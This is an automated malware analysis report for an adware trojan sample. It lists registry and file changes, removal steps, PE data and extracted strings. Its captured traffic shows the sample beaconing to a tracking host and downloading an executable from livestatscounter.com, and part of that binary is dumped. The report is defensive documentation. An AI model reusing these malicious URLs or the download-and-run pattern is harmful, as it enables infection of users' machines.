Skip to main content

Trojan.Win32.Swrort.3_f9ebaab362


not-a-virus:AdWare.Win32.ConvertAd.awxy (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: f9ebaab3623a46eea24892cb54389778

SHA1: b17cb85bfa75ccfd92f4e0eb47deb0d5bacf78b4

SHA256: 01da0ce718aadf7ca409f2796f146ad7673593ce5d85111a39d6fae1620fe0eb

SSDeep: 6144:6YfyYa3oozreDCACaOoa4SwCZo2Qiv GKpqPMN vnoL:LyYxozqmACaOJ4HCkqMN k

Size: 299520 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2016-03-30 04:22:37

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

dwwin.exe:304
%original file name%.exe:580

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:

ShimCacheMutexZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexRasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_

File activity

The process dwwin.exe:304 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)

The process %original file name%.exe:580 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\Temp\1.tmp.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes)

Registry activity

The process dwwin.exe:304 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C C2 3E BA F5 1D 8D DE 7E E8 83 0B 3C 04 43 F1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:580 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C C0 2B 3C F9 B4 99 F3 37 18 05 48 23 C4 3C 91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    dwwin.exe:304
    %original file name%.exe:580

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %WinDir%\Temp\1.tmp.exe (2784 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40962238232242564.49086af6d1d07ea6dd24a68328dd6cf3afc83
.rdata22937650666506883.4821216bd96038bb455fec443b5caa8f4a38a
.data2826241765687043.21315d8e3ab1c7ae630f53b541d9dd94eb50c
.rsrc30310484810243.80742f0a8c4da2bf99bf11bc35e76db0b38e
.reloc30720013646138243.877730a3385fed18696464f7957811fd02bc6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://events.datahouse-us.com/Um7UdXgzvHWLL7R52.86.227.248
hxxp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b50.7.86.58

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /Um7UdXgzvHWLL7R HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: events.datahouse-us.com

Content-Length: 215

Cache-Control: no-cache

{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"1726\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}

HTTP/1.1 200 OK

Server: openresty/1.9.7.3

Date: Sun, 03 Apr 2016 17:17:22 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 15

Connection: keep-alive

Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE

Access-Control-Allow-Origin: *

{"Status":"OK"}HTTP/1.1 200 OK..Server: openresty/1.9.7.3..Date: Sun, 03 Apr 2016 17:17:22 GMT..Content-Type: application/json; charset=utf-8..Content-Length: 15..Connection: keep-alive..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..{"Status":"OK"}....

POST /Um7UdXgzvHWLL7R HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: events.datahouse-us.com

Content-Length: 215

Cache-Control: no-cache

{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5981\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}

HTTP/1.1 200 OK

Server: openresty/1.9.7.3

Date: Sun, 03 Apr 2016 17:17:22 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 15

Connection: keep-alive

Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE

Access-Control-Allow-Origin: *

{"Status":"OK"}....

POST /Um7UdXgzvHWLL7R HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: events.datahouse-us.com

Content-Length: 215

Cache-Control: no-cache

{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}

HTTP/1.1 200 OK

Server: openresty/1.9.7.3

Date: Sun, 03 Apr 2016 17:17:23 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 15

Connection: keep-alive

Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE

Access-Control-Allow-Origin: *

{"Status":"OK"}....

POST /Um7UdXgzvHWLL7R HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: events.datahouse-us.com

Content-Length: 215

Cache-Control: no-cache

{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}

HTTP/1.1 200 OK

Server: openresty/1.9.7.3

Date: Sun, 03 Apr 2016 17:17:23 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 15

Connection: keep-alive

Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE

Access-Control-Allow-Origin: *

{"Status":"OK"}HTTP/1.1 200 OK..Server: openresty/1.9.7.3..Date: Sun, 03 Apr 2016 17:17:23 GMT..Content-Type: application/json; charset=utf-8..Content-Length: 15..Connection: keep-alive..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..{"Status":"OK"}..

GET /SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Sun, 03 Apr 2016 17:16:43 GMT

Content-Type: application/octet-stream

Content-Length: 154218

Connection: keep-alive

X-Powered-By: PHP/5.5.32

Content-Transfer-Encoding: binary

Content-Disposition: attachment; filename=lA5M2

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................... ............@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_580:

.text

.text

`.rdata

`.rdata

.data

.data

.rsrc

.rsrc

@.reloc

@.reloc

FTPWj

FTPWj

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

portuguese-brazilian

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

operator

operator

GetProcessWindowStation

GetProcessWindowStation

2nlDP2i6OrSdDSwRegOpenKeyExW

2nlDP2i6OrSdDSwRegOpenKeyExW

2nlDP2i6OrSdDSwRegCloseKey

2nlDP2i6OrSdDSwRegCloseKey

Offer.cpp

Offer.cpp

OfferList.cpp

OfferList.cpp

thread_pool.cpp

thread_pool.cpp

2nlDP2i6OrSdDSwWinHttpCrackUrl

2nlDP2i6OrSdDSwWinHttpCrackUrl

2nlDP2i6OrSdDSwHttpSendRequestW

2nlDP2i6OrSdDSwHttpSendRequestW

2nlDP2i6OrSdDSwHttpOpenRequestW

2nlDP2i6OrSdDSwHttpOpenRequestW

CRYPT32.dll

CRYPT32.dll

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

GetCPInfo

GetCPInfo

GetProcessHeap

GetProcessHeap

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x6db97ddc@3constants@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x6db97ddc@3constants@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xd8c8bf65@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xd8c8bf65@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@precheck@@@tr1@std@@

.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@precheck@@@tr1@std@@

zcÁ

zcÁ

0 0$0(0,0

0 0$0(0,0

6 6(60686

6 6(60686

> >$>,>@>`>

> >$>,>@>`>

mscoree.dll

mscoree.dll

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

KERNEL32.DLL

KERNEL32.DLL

WUSER32.DLL

WUSER32.DLL

2nlDP2i6OrSdDSwShlwapi.dll

2nlDP2i6OrSdDSwShlwapi.dll

2nlDP2i6OrSdDSwhttp

2nlDP2i6OrSdDSwhttp

2nlDP2i6OrSdDSwchrome

2nlDP2i6OrSdDSwchrome

2nlDP2i6OrSdDSwfirefox

2nlDP2i6OrSdDSwfirefox

W2nlDP2i6OrSdDSwAdvapi32.dll

W2nlDP2i6OrSdDSwAdvapi32.dll

2nlDP2i6OrSdDSwSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

2nlDP2i6OrSdDSwSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

2nlDP2i6OrSdDSwmscoree.dll

2nlDP2i6OrSdDSwmscoree.dll

2nlDP2i6OrSdDSwv1.0.3705

2nlDP2i6OrSdDSwv1.0.3705

2nlDP2i6OrSdDSwKernel32.dll

2nlDP2i6OrSdDSwKernel32.dll

2nlDP2i6OrSdDSwSoftware\Microsoft\.NETFramework\Policy\v1.0

2nlDP2i6OrSdDSwSoftware\Microsoft\.NETFramework\Policy\v1.0

2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v1.1.4322

2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v1.1.4322

2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v2.0.50727

2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v2.0.50727

2nlDP2i6OrSdDSwv1.1.4322

2nlDP2i6OrSdDSwv1.1.4322

2nlDP2i6OrSdDSwv2.0.50727

2nlDP2i6OrSdDSwv2.0.50727

2nlDP2i6OrSdDSwv4.0.30319

2nlDP2i6OrSdDSwv4.0.30319

2nlDP2i6OrSdDSwcmd_args

2nlDP2i6OrSdDSwcmd_args

2nlDP2i6OrSdDSwexe_link

2nlDP2i6OrSdDSwexe_link

2nlDP2i6OrSdDSwreg_keys

2nlDP2i6OrSdDSwreg_keys

2nlDP2i6OrSdDSwreg_keys_post

2nlDP2i6OrSdDSwreg_keys_post

2nlDP2i6OrSdDSwreg_key

2nlDP2i6OrSdDSwreg_key

Kernel32.dll

Kernel32.dll

2nlDP2i6OrSdDSw?url=

2nlDP2i6OrSdDSw?url=

e.exe

e.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\CleanBrowser

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\CleanBrowser

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\ContentPush

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\ContentPush

hXXp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b

hXXp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b

2nlDP2i6OrSdDSwSoftware\Microsoft\Windows\CurrentVersion\RunOnce

2nlDP2i6OrSdDSwSoftware\Microsoft\Windows\CurrentVersion\RunOnce

2nlDP2i6OrSdDSwhXXps://livestatscounter.com/Generic/sys/lst.php

2nlDP2i6OrSdDSwhXXps://livestatscounter.com/Generic/sys/lst.php

2nlDP2i6OrSdDSwHKEY_LOCAL_MACHINE

2nlDP2i6OrSdDSwHKEY_LOCAL_MACHINE

2nlDP2i6OrSdDSwHKEY_CURRENT_USER

2nlDP2i6OrSdDSwHKEY_CURRENT_USER

2nlDP2i6OrSdDSwWinhttp.dll

2nlDP2i6OrSdDSwWinhttp.dll

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

2nlDP2i6OrSdDSwWininet.dll

2nlDP2i6OrSdDSwWininet.dll

2nlDP2i6OrSdDSwWinInet.dll

2nlDP2i6OrSdDSwWinInet.dll

2nlDP2i6OrSdDSwContent-Type: application/x-www-form-urlencoded

2nlDP2i6OrSdDSwContent-Type: application/x-www-form-urlencoded

2nlDP2i6OrSdDSw{"data":"{\"channel_id\":\"%s\",\"event_event_id\":\"%d\",\"utm_addition\":\"%s\",\"guid\":\"%s\",\"offer_id\":\"%s\",\"browser_name\":\"\"}","table":"event_has_user"}

2nlDP2i6OrSdDSw{"data":"{\"channel_id\":\"%s\",\"event_event_id\":\"%d\",\"utm_addition\":\"%s\",\"guid\":\"%s\",\"offer_id\":\"%s\",\"browser_name\":\"\"}","table":"event_has_user"}

2nlDP2i6OrSdDSwhXXp://events.datahouse-us.com/Um7UdXgzvHWLL7R

2nlDP2i6OrSdDSwhXXp://events.datahouse-us.com/Um7UdXgzvHWLL7R

c:\%original file name%.exe

c:\%original file name%.exe